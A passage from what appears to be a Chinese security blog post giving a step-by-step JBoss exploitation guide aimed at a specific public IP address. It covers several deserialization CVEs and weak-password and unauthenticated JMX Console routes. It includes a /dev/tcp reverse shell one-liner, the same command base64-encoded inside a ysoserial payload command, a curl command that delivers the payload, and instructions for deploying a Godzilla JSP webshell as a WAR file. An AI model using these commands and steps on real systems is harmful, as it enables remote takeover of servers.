当前位置: 首页 > news >正文

Jboss中间件漏洞攻略

news 2025/3/26 4:59:09

CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞,这是典的JBoss反序列化漏洞JBoss/invoker/JMXInvokerServlet读取户传⼊的对我们利用Apache Commons Collections   Gadget 任意代

 访问地址 http://39.105.61.160:8080/invoker/JMXInvokerServlet1.返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

 下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

 将反弹shell进⾏base64编码

bash -i >& /dev/tcp/39.105.61.160/6666 0>&1

 监听6666端口

使用cmd

 java -jar "C:\Users\23215.呵呵\Documents\WeChat Files\wxid_1jxr0075qqd422\FileStorage\File\2025-03\ysoserial-all.jar" CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8zOS4xMDUuNjEuMTYwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}">exp.ser

执行后在当前目录会生成一个exp.ser

再使用curl http://39.105.61.160:8080/invoker/JMXInvokerServlet --data-binary @exp.ser,那么就可以成功监听到端口

CVE-2017-7504

JBossMQ JMS 序列化漏洞,JBoss AS 4.x之前版本中JbossMQJMS over HTTP Invocation LayerHTTPServerILServlet.java序列化漏洞者可借助特制的序列化数据漏洞执任意代码执

访问漏洞地址,出现此页面说明存在漏洞

http://39.105.61.160:8080/jbossmq-httpil/HTTPServerILServlet

 在kali中使用jexboss工具

python3 jexboss.py -u http://39.105.61.160:8080

 

拿到shell 

​​​​​​​CVE-2017-12149

JBoss 5.x/6.x序列化漏洞,该漏洞为 Java序列化错在于 Jboss  HttpInvoker 件中的 ReadOnlyAccessFilter滤器中过滤器在没有进任何查的情况尝试将⾃客数据流进⾏反序列化⽽导了漏洞

使用jboss反序列化_CVE-2017-12149.jar

 ​​​​​​​Administration Console

Administration Console⻚⾯存在弱`admin:admin`陆后台war , getshell

 访问漏洞⻚⾯,出现404则存在漏洞

http://39.105.61.160:8080/invoker/readonly

点击Administration console

 使用弱口令登录,admin;vulhub

 点击Web Application (WAR)->Add New Web Application (WAR)

使用哥斯拉生成jsp木马,写入shell.jsp,压缩为shell.zip,将名字改为shell.war 

上传后通过http://39.105.61.160:8080/shell/shell.jsp访问,可使用哥斯拉连接就可以了

​​​​​​​低版本JMX  Console未授

JMX Console未授权访问Getshell,此漏洞JBoss/jmx-console/HtmlAdaptor路径对开放有任何身份致攻以进⼊到   jmx并在中执任何

点击JMX Console

使用弱口令登录,admin;admin

 

 登陆后找到jboss.deployment

 点击flavor=URL后找到void addURL(),第一个

将shell.war放到服务器上

 http://39.105.61.160/shell.war

点击Invoke, 出现下图代表成功

使用http://39.105.61.160/shell/shell.jsp就能访问到,之后使用哥斯拉连接 

版本JMX  Console未授

JMX Console访接点JBoss  JMX Console 接进JMX Console⻚⾯, 通过部war, getshell

点击JMX Console,账号admin;vulhub

 登陆后点击jboss.system->service=MainDeployer

 找到deloy部署http://39.105.61.160/shell.war,点击Invoke

使用http://39.105.61.160/shell/shell.jsp就能访问到,之后使用哥斯拉连接 


http://www.mrgr.cn/news/95582.html

相关文章:

  • 算法基础篇(1)(蓝桥杯常考点)
  • 题型笔记 | Apriori算法
  • MinGW与使用VScode写C语言适配
  • QEMU源码全解析 —— 块设备虚拟化(7)
  • 架构思维:分布式系统的常用理论
  • 《背影》再读:时光深处的温暖与感触
  • 网心云OEC/OEC-turbo刷机问题——教程、错误、下载boot失败解决尝试
  • 如何理解G/T、EIRP
  • stm32week8
  • 文件的分片上传vs流失上传
  • 线段树与扫描线 —— 详解算法思想及其C++实现
  • 相控阵雷达的EIRP和G/T
  • NIO ByteBuffer 总结
  • c++之迭代器
  • Python环境安装
  • python实战,提取数据汇聚到表格中
  • 使用 docker compse 启动 Milvus 修改 MINIO_ACCESS_KEY 导致启动失败
  • 分库分表后,跨库查询和分布式事务解决方案
  • 【图像处理基石】ISP中的TNR算法详解:原理、实现与优化
  • 【AVRCP】AVRCP与BIP互操作性深度解析:封面艺术传输的技术实现